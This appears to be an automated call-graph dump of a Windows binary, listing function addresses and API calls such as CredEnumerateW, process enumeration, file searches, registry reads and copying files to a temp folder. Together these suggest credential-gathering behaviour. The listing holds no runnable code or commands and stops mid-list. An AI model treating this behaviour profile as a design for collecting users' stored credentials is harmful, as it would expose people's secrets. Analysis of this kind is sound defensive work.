37987->37917 37988 40adb3 _wcsicmp 37988->37987 37988->37989 37989->37987 37989->37988 38082 40dce0 37990->38082 37992 40dd3a GetModuleHandleW 38087 40dba7 37992->38087 37996 40dce0 3 API calls 37995->37996 37997 40db99 37996->37997 38159 40dae1 37997->38159 38173 402f3a 38000->38173 38002 412766 38002->37920 38002->37926 38003 4126d3 _wcsicmp 38004 4126a8 38003->38004 38004->38002 38004->38003 38006 41270a 38004->38006 38209 4125f8 7 API calls 38004->38209 38006->38002 38176 411ac5 38006->38176 38017 4125da 38016->38017 38018 4125f0 38017->38018 38019 4125e6 DeleteObject 38017->38019 38021 40b1ab ??3@YAXPAX ??3@YAXPAX 38018->38021 38019->38018 38020->37933 38021->37930 38023 40b640 38022->38023 38024 40b639 ??3@YAXPAX 38022->38024 38025 40b1ab ??3@YAXPAX ??3@YAXPAX 38023->38025 38024->38023 38025->37938 38027 40a83b GetSystemDirectoryW 38026->38027 38028 40a84c wcscpy 38026->38028 38027->38028 38033 409719 wcslen 38028->38033 38031 40a881 LoadLibraryW 38032 40a886 38031->38032 38032->37956 38032->37959 38034 409724 38033->38034 38035 409739 wcscat LoadLibraryW 38033->38035 38034->38035 38036 40972c wcscat 38034->38036 38035->38031 38035->38032 38036->38035 38038 444732 38037->38038 38039 444728 DeleteObject 38037->38039 38049 409cc3 38038->38049 38039->38038 38041 412551 38042 4010f9 38041->38042 38043 401130 38042->38043 38044 401134 GetModuleHandleW LoadIconW 38043->38044 38045 401107 wcsncat 38043->38045 38046 40a7be 38044->38046 38045->38043 38047 40a7d2 wcscpy 38046->38047 38047->37911 38048->37965 38052 409bfd memset wcscpy 38049->38052 38051 409cdb CreateFontIndirectW 38051->38041 38052->38051 38053->37983 38055 40aa14 38054->38055 38056 40aa0a ??3@YAXPAX 38054->38056 38055->37986 38056->38055 38058 40a8eb 38057->38058 38059 40a8df wcslen 38057->38059 38060 40a906 ??3@YAXPAX 38058->38060 38061 40a90f 38058->38061 38059->38058 38062 40a919 38060->38062 38063 4099f4 3 API calls 38061->38063 38064 40a932 38062->38064 38065 40a929 ??3@YAXPAX 38062->38065 38063->38062 38067 4099f4 3 API calls 38064->38067 38066 40a93e memcpy 38065->38066 38066->37983 38068 40a93d 38067->38068 38068->38066 38070 409a41 38069->38070 38071 4099fb 38069->38071 38070->37983 38071->38071 38072 409a0a malloc 38071->38072 38073 409a37 38072->38073 38074 409a1c 38072->38074 38073->37983 38075 409a30 ??3@YAXPAX 38074->38075 38076 409a20 memcpy 38074->38076 38075->38073 38076->38075 38078 40a9e7 38077->38078 38079 40a9dc ??3@YAXPAX 38077->38079 38081 4099f4 3 API calls 38078->38081 38080 40a9f2 38079->38080 38080->37984 38081->38080 38106 409bca GetModuleFileNameW 38082->38106 38084 40dce6 wcsrchr 38085 40dcf5 38084->38085 38086 40dcf9 wcscat 38084->38086 38085->38086 38086->37992 38107 44db70 38087->38107 38091 40dbfd 38110 4447d9 38091->38110 38094 40dc34 wcscpy wcscpy 38136 40d6f5 38094->38136 38095 40dc1f wcscpy 38095->38094 38098 40d6f5 3 API calls 38099 40dc73 38098->38099 38100 40d6f5 3 API calls 38099->38100 38101 40dc89 38100->38101 38102 40d6f5 3 API calls 38101->38102 38103 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38102->38103 38142 40da80 38103->38142 38106->38084 38108 40dbb4 memset memset 38107->38108 38109 409bca GetModuleFileNameW 38108->38109 38109->38091 38112 4447f4 38110->38112 38111 40dc1b 38111->38094 38111->38095 38112->38111 38113 444807 ??2@YAPAXI 38112->38113 38114 44481f 38113->38114 38115 444873 _snwprintf 38114->38115 38116 4448ab wcscpy 38114->38116 38149 44474a 8 API calls 38115->38149 38118 4448bb 38116->38118 38150 44474a 8 API calls 38118->38150 38119 4448a7 38119->38116 38119->38118 38121 4448cd 38151 44474a 8 API calls 38121->38151 38123 4448e2 38152 44474a 8 API calls 38123->38152 38125 4448f7 38153 44474a 8 API calls 38125->38153 38127 44490c 38154 44474a 8 API calls 38127->38154 38129 444921 38155 44474a 8 API calls 38129->38155 38131 444936 38156 44474a 8 API calls 38131->38156 38133 44494b 38157 44474a 8 API calls 38133->38157 38135 444960 ??3@YAXPAX 38135->38111 38137 44db70 38136->38137 38138 40d702 memset GetPrivateProfileStringW 38137->38138 38139 40d752 38138->38139 38140 40d75c WritePrivateProfileStringW 38138->38140 38139->38140 38141 40d758 38139->38141 38140->38141 38141->38098 38143 44db70 38142->38143 38144 40da8d memset 38143->38144 38145 40daac LoadStringW 38144->38145 38146 40dac6 38145->38146 38146->38145 38148 40dade 38146->38148 38158 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38146->38158 38148->37920 38149->38119 38150->38121 38151->38123 38152->38125 38153->38127 38154->38129 38155->38131 38156->38133 38157->38135 38158->38146 38169 409b98 GetFileAttributesW 38159->38169 38161 40daea 38162 40db63 38161->38162 38163 40daef wcscpy wcscpy GetPrivateProfileIntW 38161->38163 38162->37922 38170 40d65d GetPrivateProfileStringW 38163->38170 38165 40db3e 38171 40d65d GetPrivateProfileStringW 38165->38171 38167 40db4f 38172 40d65d GetPrivateProfileStringW 38167->38172 38169->38161 38170->38165 38171->38167 38172->38162 38210 40eaff 38173->38210 38177 411ae2 memset 38176->38177 38178 411b8f 38176->38178 38250 409bca GetModuleFileNameW 38177->38250 38190 411a8b 38178->38190 38180 411b0a wcsrchr 38181 411b22 wcscat 38180->38181 38182 411b1f 38180->38182 38251 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38181->38251 38182->38181 38184 411b67 38252 402afb 38184->38252 38188 411b7f 38308 40ea13 SendMessageW memset SendMessageW 38188->38308 38191 402afb 27 API calls 38190->38191 38192 411ac0 38191->38192 38193 4110dc 38192->38193 38194 41113e 38193->38194 38199 4110f0 38193->38199 38333 40969c LoadCursorW SetCursor 38194->38333 38196 411143 38206 40b633 ??3@YAXPAX 38196->38206 38334 4032b4 38196->38334 38352 40b1ab ??3@YAXPAX ??3@YAXPAX 38196->38352 38353 444a54 38196->38353 38197 4110f7 _wcsicmp 38197->38199 38198 411157 38200 40ada2 _wcsicmp 38198->38200 38199->38194 38199->38197 38356 410c46 10 API calls 38199->38356 38203 411167 38200->38203 38201 4111af 38203->38201 38204 4111a6 qsort 38203->38204 38204->38201 38206->38198 38209->38004 38211 40eb10 38210->38211 38223 40e8e0 38211->38223 38214 40eb6c memcpy memcpy 38218 40ebb7 38214->38218 38215 40ebf2 ??2@YAPAXI ??2@YAPAXI 38217 40ec2e ??2@YAPAXI 38215->38217 38220 40ec65 38215->38220 38216 40d134 16 API calls 38216->38218 38217->38220 38218->38214 38218->38215 38218->38216 38220->38220 38233 40ea7f 38220->38233 38222 402f49 38222->38004 38224 40e8f2 38223->38224 38225 40e8eb ??3@YAXPAX 38223->38225 38226 40e900 38224->38226 38227 40e8f9 ??3@YAXPAX 38224->38227 38225->38224 38228 40e911 38226->38228 38229 40e90a ??3@YAXPAX 38226->38229 38227->38226 38230 40e931 ??2@YAPAXI ??2@YAPAXI 38228->38230 38231 40e921 ??3@YAXPAX 38228->38231 38232 40e92a ??3@YAXPAX 38228->38232 38229->38228 38230->38214 38231->38232 38232->38230 38234 40aa04 ??3@YAXPAX 38233->38234 38235 40ea88 38234->38235 38236 40aa04 ??3@YAXPAX 38235->38236 38237 40ea90 38236->38237 38238 40aa04 ??3@YAXPAX 38237->38238 38239 40ea98 38238->38239 38240 40aa04 ??3@YAXPAX 38239->38240 38241 40eaa0 38240->38241 38242 40a9ce 4 API calls 38241->38242 38243 40eab3 38242->38243 38244 40a9ce 4 API calls 38243->38244 38245 40eabd 38244->38245 38246 40a9ce 4 API calls 38245->38246 38247 40eac7 38246->38247 38248 40a9ce 4 API calls 38247->38248 38249 40ead1 38248->38249 38249->38222 38250->38180 38251->38184 38309 40b2cc 38252->38309 38254 402b0a 38255 40b2cc 27 API calls 38254->38255 38256 402b23 38255->38256 38257 40b2cc 27 API calls 38256->38257 38258 402b3a 38257->38258 38259 40b2cc 27 API calls 38258->38259 38260 402b54 38259->38260 38261 40b2cc 27 API calls 38260->38261 38262 402b6b 38261->38262 38263 40b2cc 27 API calls 38262->38263 38264 402b82 38263->38264 38265 40b2cc 27 API calls 38264->38265 38266 402b99 38265->38266 38267 40b2cc 27 API calls 38266->38267 38268 402bb0 38267->38268 38269 40b2cc 27 API calls 38268->38269 38270 402bc7 38269->38270 38271 40b2cc 27 API calls 38270->38271 38272 402bde 38271->38272 38273 40b2cc 27 API calls 38272->38273 38274 402bf5 38273->38274 38275 40b2cc 27 API calls 38274->38275 38276 402c0c 38275->38276 38277 40b2cc 27 API calls 38276->38277 38278 402c23 38277->38278 38279 40b2cc 27 API calls 38278->38279 38280 402c3a 38279->38280 38281 40b2cc 27 API calls 38280->38281 38282 402c51 38281->38282 38283 40b2cc 27 API calls 38282->38283 38284 402c68 38283->38284 38285 40b2cc 27 API calls 38284->38285 38286 402c7f 38285->38286 38287 40b2cc 27 API calls 38286->38287 38288 402c99 38287->38288 38289 40b2cc 27 API calls 38288->38289 38290 402cb3 38289->38290 38291 40b2cc 27 API calls 38290->38291 38292 402cd5 38291->38292 38293 40b2cc 27 API calls 38292->38293 38294 402cf0 38293->38294 38295 40b2cc 27 API calls 38294->38295 38296 402d0b 38295->38296 38297 40b2cc 27 API calls 38296->38297 38298 402d26 38297->38298 38299 40b2cc 27 API calls 38298->38299 38300 402d3e 38299->38300 38301 40b2cc 27 API calls 38300->38301 38302 402d59 38301->38302 38303 40b2cc 27 API calls 38302->38303 38304 402d78 38303->38304 38305 40b2cc 27 API calls 38304->38305 38306 402d93 38305->38306 38307 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38306->38307 38307->38188 38308->38178 38312 40b58d 38309->38312 38311 40b2d1 38311->38254 38313 40b5a4 GetModuleHandleW FindResourceW 38312->38313 38314 40b62e 38312->38314 38315 40b5c2 LoadResource 38313->38315 38317 40b5e7 38313->38317 38314->38311 38316 40b5d0 SizeofResource LockResource 38315->38316 38315->38317 38316->38317 38317->38314 38325 40afcf 38317->38325 38319 40b608 memcpy 38328 40b4d3 memcpy 38319->38328 38321 40b61e 38329 40b3c1 18 API calls 38321->38329 38323 40b626 38330 40b04b 38323->38330 38326 40b04b ??3@YAXPAX 38325->38326 38327 40afd7 ??2@YAPAXI 38326->38327 38327->38319 38328->38321 38329->38323 38331 40b051 ??3@YAXPAX 38330->38331 38332 40b05f 38330->38332 38331->38332 38332->38314 38333->38196 38335 4032c4 38334->38335 38336 40b633 ??3@YAXPAX 38335->38336 38337 403316 38336->38337 38357 44553b 38337->38357 38341 403480 38553 40368c 15 API calls 38341->38553 38343 403489 38344 40b633 ??3@YAXPAX 38343->38344 38345 403495 38344->38345 38345->38198 38346 4033a9 memset memcpy 38347 4033ec wcscmp 38346->38347 38348 40333c 38346->38348 38347->38348 38348->38341 38348->38346 38348->38347 38551 4028e7 11 API calls 38348->38551 38552 40f508 6 API calls 38348->38552 38350 403421 _wcsicmp 38350->38348 38352->38198 38354 444a64 FreeLibrary 38353->38354 38355 444a83 38353->38355 38354->38355 38355->38198 38356->38199 38358 445548 38357->38358 38359 445599 38358->38359 38554 40c768 38358->38554 38360 4455a8 memset 38359->38360 38367 4457f2 38359->38367 38637 403988 38360->38637 38370 445854 38367->38370 38739 403e2d memset memset memset memset memset 38367->38739 38368 4458bb memset memset 38374 414c2e 16 API calls 38368->38374 38420 4458aa 38370->38420 38762 403c9c memset memset memset memset memset 38370->38762 38372 44595e memset memset 38380 414c2e 16 API calls 38372->38380 38373 4455e5 38377 445672 38373->38377 38383 44560f 38373->38383 38375 4458f9 38374->38375 38381 40b2cc 27 API calls 38375->38381 38648 403fbe memset memset memset memset memset 38377->38648 38378 445a00 memset memset 38785 414c2e 38378->38785 38379 445b22 38385 445bca 38379->38385 38386 445b38 memset memset memset 38379->38386 38390 44599c 38380->38390 38391 445909 38381->38391 38382 44557a 38417 44558c 38382->38417 38834 41366b FreeLibrary 38382->38834 38394 4087b3 338 API calls 38383->38394 38384 445849 38849 40b1ab ??3@YAXPAX ??3@YAXPAX 38384->38849 38392 445c8b memset memset 38385->38392 38459 445cf0 38385->38459 38395 445bd4 38386->38395 38396 445b98 38386->38396 38399 40b2cc 27 API calls 38390->38399 38400 409d1f 6 API calls 38391->38400 38404 414c2e 16 API calls 38392->38404 38393 44589f 38850 40b1ab ??3@YAXPAX ??3@YAXPAX 38393->38850 38401 445621 38394->38401 38410 414c2e 16 API calls 38395->38410 38396->38395 38406 445ba2 38396->38406 38403 4459ac 38399->38403 38414 445919 38400->38414 38835 4454bf 20 API calls 38401->38835 38402 445823 38402->38384 38425 4087b3 338 API calls 38402->38425 38415 409d1f 6 API calls 38403->38415 38416 445cc9 38404->38416 38923 4099c6 wcslen 38406->38923 38407 4456b2 38837 40b1ab ??3@YAXPAX ??3@YAXPAX 38407->38837 38409 40b2cc 27 API calls 38421 445a4f 38409->38421 38423 445be2 38410->38423 38411 403335 38550 4452e5 45 API calls 38411->38550 38412 445d3d 38443 40b2cc 27 API calls 38412->38443 38413 445d88 memset memset memset 38426 414c2e 16 API calls 38413->38426 38851 409b98 GetFileAttributesW 38414->38851 38427 4459bc 38415->38427 38428 409d1f 6 API calls 38416->38428 38621 444b06 38417->38621 38418 445879 38418->38393 38439 4087b3 338 API calls 38418->38439 38420->38368 38444 44594a 38420->38444 38800 409d1f wcslen wcslen 38421->38800 38432 40b2cc 27 API calls 38423->38432 38425->38402 38436 445dde 38426->38436 38919 409b98 GetFileAttributesW 38427->38919 38438 445ce1 38428->38438 38429 445bb3 38926 445403 memset 38429->38926 38430 445680 38430->38407 38671 4087b3 memset 38430->38671 38433 445bf3 38432->38433 38442 409d1f 6 API calls 38433->38442 38434 445928 38434->38444 38852 40b6ef 38434->38852 38445 40b2cc 27 API calls 38436->38445 38943 409b98 GetFileAttributesW 38438->38943 38439->38418 38453 445c07 38442->38453 38454 445d54 _wcsicmp 38443->38454 38444->38372 38458 4459ed 38444->38458 38457 445def 38445->38457 38446 4459cb 38446->38458 38467 40b6ef 252 API calls 38446->38467 38450 40b2cc 27 API calls 38451 445a94 38450->38451 38805 40ae18 38451->38805 38452 44566d 38452->38367 38722 413d4c 38452->38722 38463 445389 258 API calls 38453->38463 38464 445d71 38454->38464 38529 445d67 38454->38529 38456 445665 38836 40b1ab ??3@YAXPAX ??3@YAXPAX 38456->38836 38465 409d1f 6 API calls 38457->38465 38458->38378 38458->38379 38459->38411 38459->38412 38459->38413 38460 445389 258 API calls 38460->38385 38469 445c17 38463->38469 38944 445093 23 API calls 38464->38944 38472 445e03 38465->38472 38467->38458 38468 4456d8 38474 40b2cc 27 API calls 38468->38474 38475 40b2cc 27 API calls 38469->38475 38471 44563c 38471->38456 38477 4087b3 338 API calls 38471->38477 38945 409b98 GetFileAttributesW 38472->38945 38473 40b6ef 252 API calls 38473->38411 38479 4456e2 38474->38479 38480 445c23 38475->38480 38476 445d83 38476->38411 38477->38471 38838 413fa6 _wcsicmp _wcsicmp 38479->38838 38484 409d1f 6 API calls 38480->38484 38482 445e12 38489 445e6b 38482->38489 38495 40b2cc 27 API calls 38482->38495 38487 445c37 38484->38487 38485 445aa1 38488 445b17 38485->38488 38503 445ab2 memset 38485->38503 38516 409d1f 6 API calls 38485->38516 38812 40add4 38485->38812 38817 445389 38485->38817 38826 40ae51 38485->38826 38486 4456eb 38491 4456fd memset memset memset memset 38486->38491 38492 4457ea 38486->38492 38493 445389 258 API calls 38487->38493 38920 40aebe 38488->38920 38947 445093 23 API calls 38489->38947 38839 409c70 wcscpy wcsrchr 38491->38839 38842 413d29 38492->38842 38498 445c47 38493->38498 38499 445e33 38495->38499 38505 40b2cc 27 API calls 38498->38505 38506 409d1f 6 API calls 38499->38506 38501 445e7e 38502 445f67 38501->38502 38511 40b2cc 27 API calls 38502->38511 38507 40b2cc 27 API calls 38503->38507 38509 445c53 38505->38509 38510 445e47 38506->38510 38507->38485 38508 409c70 2 API calls 38512 44577e 38508->38512 38513 409d1f 6 API calls 38509->38513 38946 409b98 GetFileAttributesW 38510->38946 38515 445f73 38511->38515 38517 409c70 2 API calls 38512->38517 38518 445c67 38513->38518 38520 409d1f 6 API calls 38515->38520 38516->38485 38521 44578d 38517->38521 38522 445389 258 API calls 38518->38522 38519 445e56 38519->38489 38525 445e83 memset 38519->38525 38523 445f87 38520->38523 38521->38492 38528 40b2cc 27 API calls 38521->38528 38522->38385 38950 409b98 GetFileAttributesW 38523->38950 38527 40b2cc 27 API calls 38525->38527 38530 445eab 38527->38530 38531 4457a8 38528->38531 38529->38411 38529->38473 38532 409d1f 6 API calls 38530->38532 38533 409d1f 6 API calls 38531->38533 38534 445ebf 38532->38534 38535 4457b8 38533->38535 38536 40ae18 9 API calls 38534->38536 38841 409b98 GetFileAttributesW 38535->38841 38546 445ef5 38536->38546 38538 4457c7 38538->38492 38540 4087b3 338 API calls 38538->38540 38539 40ae51 9 API calls 38539->38546 38540->38492 38541 445f5c 38543 40aebe FindClose 38541->38543 38542 40add4 2 API calls 38542->38546 38543->38502 38544 40b2cc 27 API calls 38544->38546 38545 409d1f 6 API calls 38545->38546 38546->38539 38546->38541 38546->38542 38546->38544 38546->38545 38548 445f3a 38546->38548 38948 409b98 GetFileAttributesW 38546->38948 38949 445093 23 API calls 38548->38949 38550->38348 38551->38350 38552->38348 38553->38343 38555 40c775 38554->38555 38951 40b1ab ??3@YAXPAX ??3@YAXPAX 38555->38951 38557 40c788 38952 40b1ab ??3@YAXPAX ??3@YAXPAX 38557->38952 38559 40c790 38953 40b1ab ??3@YAXPAX ??3@YAXPAX 38559->38953 38561 40c798 38562 40aa04 ??3@YAXPAX 38561->38562 38563 40c7a0 38562->38563 38954 40c274 memset 38563->38954 38568 40a8ab 9 API calls 38569 40c7c3 38568->38569 38570 40a8ab 9 API calls 38569->38570 38571 40c7d0 38570->38571 38983 40c3c3 38571->38983 38575 40c7e5 38576 40c877 38575->38576 38577 40c86c 38575->38577 38583 40c634 49 API calls 38575->38583 39008 40a706 38575->39008 38584 40bdb0 38576->38584 39025 4053fe 39 API calls 38577->39025 38583->38575 39215 404363 38584->39215 38587 40bf5d 39235 40440c 38587->39235 38589 40bdee 38589->38587 38592 40b2cc 27 API calls 38589->38592 38590 40bddf CredEnumerateW 38590->38589 38593 40be02 wcslen 38592->38593 38593->38587 38600 40be1e 38593->38600 38594 40be26 _wcsncoll 38594->38600 38597 40be7d memset 38598 40bea7 memcpy 38597->38598 38597->38600 38599 40bf11 wcschr 38598->38599 38598->38600 38599->38600 38600->38587 38600->38594 38600->38597 38600->38598 38600->38599 38601 40b2cc 27 API calls 38600->38601 38603 40bf43 LocalFree 38600->38603 39238 40bd5d 28 API calls 38600->39238 39239 404423 38600->39239 38602 40bef6 _wcsnicmp 38601->38602 38602->38599 38602->38600 38603->38600 38604 4135f7 39252 4135e0 38604->39252 38607 40b2cc 27 API calls 38608 41360d 38607->38608 38609 40a804 8 API calls 38608->38609 38610 413613 38609->38610 38611 41361b 38610->38611 38612 41363e 38610->38612 38613 40b273 27 API calls 38611->38613 38614 4135e0 FreeLibrary 38612->38614 38615 413625 GetProcAddress 38613->38615 38616 413643 38614->38616 38615->38612 38617 413648 38615->38617 38616->38382 38618 413658 38617->38618 38619 4135e0 FreeLibrary 38617->38619 38618->38382 38620 413666 38619->38620 38620->38382 39255 4449b9 38621->39255 38624 444c1f 38624->38359 38625 4449b9 42 API calls 38627 444b4b 38625->38627 38626 444c15 38629 4449b9 42 API calls 38626->38629 38627->38626 39276 444972 GetVersionExW 38627->39276 38629->38624 38630 444b99 memcmp 38635 444b8c 38630->38635 38631 444c0b 39280 444a85 42 API calls 38631->39280 38635->38630 38635->38631 39277 444aa5 42 API calls 38635->39277 39278 40a7a0 GetVersionExW 38635->39278 39279 444a85 42 API calls 38635->39279 38638 40399d 38637->38638 39281 403a16 38638->39281 38640 403a09 39295 40b1ab ??3@YAXPAX ??3@YAXPAX 38640->39295 38642 403a12 wcsrchr 38642->38373 38643 4039a3 38643->38640 38646 4039f4 38643->38646 39292 40a02c CreateFileW 38643->39292 38646->38640 38647 4099c6 2 API calls 38646->38647 38647->38640 38649 414c2e 16 API calls 38648->38649 38650 404048 38649->38650 38651 414c2e 16 API calls 38650->38651 38652 404056 38651->38652 38653 409d1f 6 API calls 38652->38653 38654 404073 38653->38654 38655 409d1f 6 API calls 38654->38655 38656 40408e 38655->38656 38657 409d1f 6 API calls 38656->38657 38658 4040a6 38657->38658 38659 403af5 20 API calls 38658->38659 38660 4040ba 38659->38660 38661 403af5 20 API calls 38660->38661 38662 4040cb 38661->38662 39322 40414f memset 38662->39322 38664 404140 39336 40b1ab ??3@YAXPAX ??3@YAXPAX 38664->39336 38666 4040ec memset 38669 4040e0 38666->38669 38667 404148 38667->38430 38668 4099c6 2 API calls 38668->38669 38669->38664 38669->38666 38669->38668 38670 40a8ab 9 API calls 38669->38670 38670->38669 39349 40a6e6 WideCharToMultiByte 38671->39349 38673 4087ed 39350 4095d9 memset 38673->39350 38676 408953 38676->38430 38677 408809 memset memset memset memset memset 38678 40b2cc 27 API calls 38677->38678 38679 4088a1 38678->38679 38680 409d1f 6 API calls 38679->38680 38681 4088b1 38680->38681 38682 40b2cc 27 API calls 38681->38682 38683 4088c0 38682->38683 38684 409d1f 6 API calls 38683->38684 38685 4088d0 38684->38685 38686 40b2cc 27 API calls 38685->38686 38687 4088df 38686->38687 38688 409d1f 6 API calls 38687->38688 38689 4088ef 38688->38689 38690 40b2cc 27 API calls 38689->38690 38691 4088fe 38690->38691 38692 409d1f 6 API calls 38691->38692 38693 40890e 38692->38693 38694 40b2cc 27 API calls 38693->38694 38695 40891d 38694->38695 38696 409d1f 6 API calls 38695->38696 38697 40892d 38696->38697 39369 409b98 GetFileAttributesW 38697->39369 38699 40893e 38700 408943 38699->38700 38701 408958 38699->38701 38723 40b633 ??3@YAXPAX 38722->38723 38724 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38723->38724 38725 413f00 Process32NextW 38724->38725 38726 413da5 OpenProcess 38725->38726 38727 413f17 CloseHandle 38725->38727 38728 413df3 memset 38726->38728 38731 413eb0 38726->38731 38727->38468 39685 413f27 38728->39685 38730 413ebf ??3@YAXPAX 38730->38731 38731->38725 38731->38730 38732 4099f4 3 API calls 38731->38732 38732->38731 38734 413e37 GetModuleHandleW 38735 413e1f 38734->38735 38736 413e46 GetProcAddress 38734->38736 38735->38734 39690 413959 38735->39690 39706 413ca4 38735->39706 38736->38735 38738 413ea2 CloseHandle 38738->38731 38740 414c2e 16 API calls 38739->38740 38741 403eb7 38740->38741 38742 414c2e 16 API calls 38741->38742 38743 403ec5 38742->38743 38744 409d1f 6 API calls 38743->38744 38745 403ee2 38744->38745 38746 409d1f 6 API calls 38745->38746 38747 403efd 38746->38747 38748 409d1f 6 API calls 38747->38748 38749 403f15 38748->38749 38750 403af5 20 API calls 38749->38750 38751 403f29 38750->38751 38752 403af5 20 API calls 38751->38752 38753 403f3a 38752->38753 38754 40414f 33 API calls 38753->38754 38755 403f4f 38754->38755 38756 403faf 38755->38756 38758 403f5b memset 38755->38758 38760 4099c6 2 API calls 38755->38760 38761 40a8ab 9 API calls 38755->38761 39720 40b1ab ??3@YAXPAX ??3@YAXPAX 38756->39720 38758->38755 38759 403fb7 38759->38402 38760->38755 38761->38755 38763 414c2e 16 API calls 38762->38763 38764 403d26 38763->38764 38765 414c2e 16 API calls 38764->38765 38766 403d34 38765->38766 38767 409d1f 6 API calls 38766->38767 38768 403d51 38767->38768 38769 409d1f 6 API calls 38768->38769 38770 403d6c 38769->38770 38771 409d1f 6 API calls 38770->38771 38772 403d84 38771->38772 38773 403af5 20 API calls 38772->38773 38774 403d98 38773->38774 38775 403af5 20 API calls 38774->38775 38776 403da9 38775->38776 38777 40414f 33 API calls 38776->38777 38778 403dbe 38777->38778 38779 403e1e 38778->38779 38780 403dca memset 38778->38780 38783 4099c6 2 API calls 38778->38783 38784 40a8ab 9 API calls 38778->38784 39721 40b1ab ??3@YAXPAX ??3@YAXPAX 38779->39721 38780->38778 38782 403e26 38782->38418 38783->38778 38784->38778 38786 414b81 9 API calls 38785->38786 38787 414c40 38786->38787 38788 414c73 memset 38787->38788 39722 409cea 38787->39722 38789 414c94 38788->38789 39725 414592 RegOpenKeyExW 38789->39725 38792 414c64 38792->38409 38794 414cc1 38795 414cf4 wcscpy 38794->38795 39726 414bb0 wcscpy 38794->39726 38795->38792 38797 414cd2 39727 4145ac RegQueryValueExW 38797->39727 38799 414ce9 RegCloseKey 38799->38795 38801 409d62 38800->38801 38802 409d43 wcscpy 38800->38802 38801->38450 38803 409719 2 API calls 38802->38803 38804 409d51 wcscat 38803->38804 38804->38801 38806 40aebe FindClose 38805->38806 38807 40ae21 38806->38807 38808 4099c6 2 API calls 38807->38808 38809 40ae35 38808->38809 38810 409d1f 6 API calls 38809->38810 38811 40ae49 38810->38811 38811->38485 38813 40ade0 38812->38813 38814 40ae0f 38812->38814 38813->38814 38815 40ade7 wcscmp 38813->38815 38814->38485 38815->38814 38816 40adfe wcscmp 38815->38816 38816->38814 38818 40ae18 9 API calls 38817->38818 38820 4453c4 38818->38820 38819 40ae51 9 API calls 38819->38820 38820->38819 38821 4453f3 38820->38821 38822 40add4 2 API calls 38820->38822 38825 445403 253 API calls 38820->38825 38823 40aebe FindClose 38821->38823 38822->38820 38824 4453fe 38823->38824 38824->38485 38825->38820 38827 40ae7b FindNextFileW 38826->38827 38828 40ae5c FindFirstFileW 38826->38828 38829 40ae94 38827->38829 38830 40ae8f 38827->38830 38828->38829 38832 40aeb6 38829->38832 38833 409d1f 6 API calls 38829->38833 38831 40aebe FindClose 38830->38831 38831->38829 38832->38485 38833->38832 38834->38417 38835->38471 38836->38452 38837->38452 38838->38486 38840 409c89 38839->38840 38840->38508 38841->38538 38843 413d39 38842->38843 38844 413d2f FreeLibrary 38842->38844 38845 40b633 ??3@YAXPAX 38843->38845 38844->38843 38846 413d42 38845->38846 38847 40b633 ??3@YAXPAX 38846->38847 38848 413d4a 38847->38848 38848->38367 38849->38370 38850->38420 38851->38434 38853 44db70 38852->38853 38854 40b6fc memset 38853->38854 38855 409c70 2 API calls 38854->38855 38856 40b732 wcsrchr 38855->38856 38857 40b743 38856->38857 38858 40b746 memset 38856->38858 38857->38858 38859 40b2cc 27 API calls 38858->38859 38860 40b76f 38859->38860 38861 409d1f 6 API calls 38860->38861 38862 40b783 38861->38862 39728 409b98 GetFileAttributesW 38862->39728 38864 40b792 38865 40b7c2 38864->38865 38866 409c70 2 API calls 38864->38866 39729 40bb98 38865->39729 38868 40b7a5 38866->38868 38870 40b2cc 27 API calls 38868->38870 38874 40b7b2 38870->38874 38871 40b837 FindCloseChangeNotification 38873 40b83e memset 38871->38873 38872 40b817 39781 409a45 GetTempPathW 38872->39781 39762 40a6e6 WideCharToMultiByte 38873->39762 38877 409d1f 6 API calls 38874->38877 38877->38865 38878 40b827 CopyFileW 38878->38873 38879 40b866 38880 444432 121 API calls 38879->38880 38881 40b879 38880->38881 38882 40bad5 38881->38882 38883 40b273 27 API calls 38881->38883 38884 40baeb 38882->38884 38885 40bade DeleteFileW 38882->38885 38886 40b89a 38883->38886 38887 40b04b ??3@YAXPAX 38884->38887 38885->38884 38888 438552 134 API calls 38886->38888 38889 40baf3 38887->38889 38890 40b8a4 38888->38890 38889->38444 38891 40bacd 38890->38891 38893 4251c4 137 API calls 38890->38893 38892 443d90 111 API calls 38891->38892 38892->38882 38916 40b8b8 38893->38916 38894 40bac6 39788 424f26 123 API calls 38894->39788 38895 40b8bd memset 39763 425413 38895->39763 38898 425413 17 API calls 38898->38916 38901 40a71b MultiByteToWideChar 38901->38916 38902 40a734 MultiByteToWideChar 38902->38916 38903 4253af 17 API calls 38903->38916 38904 4253cf 17 API calls 38904->38916 38905 40b9b5 memcmp 38905->38916 38906 4099c6 2 API calls 38906->38916 38907 404423 37 API calls 38907->38916 38909 40bb3e memset memcpy 39789 40a734 MultiByteToWideChar 38909->39789 38910 4251c4 137 API calls 38910->38916 38913 40bb88 LocalFree 38913->38916 38916->38894 38916->38895 38916->38898 38916->38901 38916->38902 38916->38903 38916->38904 38916->38905 38916->38906 38916->38907 38916->38909 38916->38910 38917 40ba5f memcmp 38916->38917 38918 4099f4 3 API calls 38916->38918 39770 4253ef 38916->39770 39775 40b64c 38916->39775 39784 447280 memset 38916->39784 39785 447960 memset memcpy memcpy memcpy 38916->39785 39786 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38916->39786 39787 447920 memcpy memcpy memcpy 38916->39787 38917->38916 38918->38916 38919->38446 38921 40aed1 38920->38921 38922 40aec7 FindClose 38920->38922 38921->38379 38922->38921 38924 4099d7 38923->38924 38925 4099da memcpy 38923->38925 38924->38925 38925->38429 38927 40b2cc 27 API calls 38926->38927 38928 44543f 38927->38928 38929 409d1f 6 API calls 38928->38929 38930 44544f 38929->38930 39882 409b98 GetFileAttributesW 38930->39882 38932 44545e 38933 445476 38932->38933 38934 40b6ef 252 API calls 38932->38934 38935 40b2cc 27 API calls 38933->38935 38934->38933 38936 445482 38935->38936 38937 409d1f 6 API calls 38936->38937 38938 445492 38937->38938 39883 409b98 GetFileAttributesW 38938->39883 38940 4454a1 38941 4454b9 38940->38941 38942 40b6ef 252 API calls 38940->38942 38941->38460 38942->38941 38943->38459 38944->38476 38945->38482 38946->38519 38947->38501 38948->38546 38949->38546 38950->38529 38951->38557 38952->38559 38953->38561 38955 414c2e 16 API calls 38954->38955 38956 40c2ae 38955->38956 39026 40c1d3 38956->39026 38961 40c3be 38978 40a8ab 